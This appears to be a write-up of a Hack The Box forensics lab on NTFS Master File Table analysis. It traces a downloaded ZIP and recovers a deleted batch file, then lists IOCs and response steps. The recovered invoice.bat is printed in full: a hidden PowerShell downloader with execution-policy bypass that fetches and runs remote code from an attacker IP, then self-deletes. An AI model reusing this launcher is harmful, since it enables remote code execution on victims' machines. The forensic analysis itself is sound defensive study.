Intrusionz3r0-VaultGithubLinkedlnHackthebox

BFT

Scenario

In this Sherlock, you will become acquainted with MFT (Master File Table) forensics. You will be introduced to well-known tools and methodologies for analyzing MFT artifacts to identify malicious activity. During our analysis, you will utilize the MFTECmd tool to parse the provided MFT file, TimeLine Explorer to open and analyze the results from the parsed MFT, and a Hex editor to recover file contents from the MFT.

Summary

On 2024-02-13 at 16:39:06 a ZIP file named Stage-20240213T093324Z-001.zip was downloaded into the user profile of simon.stark (path: C:\Users\simon.stark\Downloads). The ZIP contained invoice.bat, a downloader/launcher that executes PowerShell with -nop -ep bypass to fetch and execute a remote payload from http://43.204.110.203:6666/ and then self‑deletes.

Concepts

Master File Table

The Master File Table (MFT) is a critical component within the NTFS (New Technology File System), which is the file system used by Windows operating systems. The MFT is essentially a database that stores metadata about every file and directory on an NTFS volume. Its role and structure make it a fundamental resource in digital forensics, particularly when dealing with Windows-based environments.

  • The MFT provides a detailed record of each file, including timestamps, permissions, and data content locations, making it invaluable for forensic investigations.

  • The MFT records details about each file and directory on an NTFS drive.

  • Allows to recover details about the deleted files.

  • Since the MFT records file creation and details, unusual changes detected in these entries can indicate unauthorized or malware activity.

MFTECMD: https://download.ericzimmermanstools.com/MFTECmd.zip

TimelineExplorer: https://download.ericzimmermanstools.com/net9/TimelineExplorer.zip

Hxd: https://mh-nexus.de/downloads/HxDPortableSetup.zip

Converting MFT dump file into csv using MFTECMD

MFTECMD.exe -f "C:\Your\Directory\$MFT" --csv "C:\Your\Output\Directory\" ---csvf
mft.csv

Summary

Files & Artifacts

Hash
File
Notes

74c118fe20681a053866621543d5decc

BFT.zip

Event Types Observed

Indicators of Compromise (IOCs)

Type
Indicator
Description

Zip file

Stage-20240213T093324Z-001.zip

URL Source

https://storage.googleapis.com/drive-bulk-export-anonymous/20240213T093324.039Z/4133399871716478688/a40aecd0-1cf3-4f88-b55a-e188d5c1c04f/1/c277a8b4-afa9-4d34-b8ca-e1eb5e5f983c?authuser

MOTW Zone3 indicated the file comes from internet

Malicious file

invoice.bat

Chronological Attack Timeline

The analysis was conducted using TimelineExplorer, which revealed that on 2024-02-13 at 16:39:06, a malicious file was downloaded by simon.stark at C:\Users\simon.stark\Downloads\Stage-20240213T093324Z-001.zip

Filter: EndsWith([Extension], 'zip') And IsSameDay([Created0x10], #2024-02-13#)

Searching for Stage-20240213T093324Z-001.zip:Zone.Identifier , it was determined that the files originated from the internet, along with the source of the content delivery.

Filter: IsSameDay([Created0x10], #2024-02-13#) And Contains([File Name], 'Stage')

[ZoneTransfer]
ZoneId=3
HostUrl=https://storage.googleapis.com/drive-bulk-export-anonymous/20240213T093324.039Z/4133399871716478688/a40aecd0-1cf3-4f88-b55a-e188d5c1c04f/1/c277a8b4-afa9-4d34-b8ca-e1eb5e5f983c?authuser

Zone.Identifier is an Alternate Data Stream (ADS) that Windows appends to files downloaded from the Internet. It contains the Mark of the Web (e.g., ZoneId=3, HostUrl=..., ReferrerUrl=...), which allows you to determine whether the file came from the web, its source URL, and (sometimes) the referring page. In forensic analysis, this is invaluable: it confirms that the binary was downloaded (not created locally), provides the URL for correlation with proxy/web logs, and helps time-stamp the event.

Further examination shows that at 16:38:39, a malicious invoice.bat was generated on:

  • C:\Users\simon.stark\Downloads\Stage-20240213T093324Z-001\Stage\invoice\invoices\invoice.bat

Filter: IsSameDay([Created0x10], #2024-02-13#) And Contains([Parent Path], 'Stage')

Finally, to retrieve the file content, it was used the MFT Record Number and utilizing the software HxD, it was possible to retrieve the content.

[Entry Number * 1024]

  • 23436 * 1024 = 23998464

  • HEX= 16E3000

File: invoice.bat:

@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://43.204.110.203:6666/download/powershell/Om1hdHRpZmVzdGF...') -UseBasicParsing|iex"
(goto) 2>nul & del "%~f0"

Recommendations

  • Isolate the infected host from the network and preserve a forensic image (disk + memory).

  • Block IP 43.204.110.203 and the ADS HostUrl at firewall/proxy.

  • Collect artifacts: recovered invoice.bat, mft.csv, ADS contents, PowerShell logs, proxy logs; compute SHA256.

  • Hunt the environment for the HostUrl, downloader URL, file names and hashes.

  • Check persistence: Scheduled Tasks, Registry Run keys, Services, WMI persistence.

  • Rotate credentials if compromise of credentials is suspected.

  • Consider rebuild if system integrity is uncertain.

PreviousBrutus

Last updated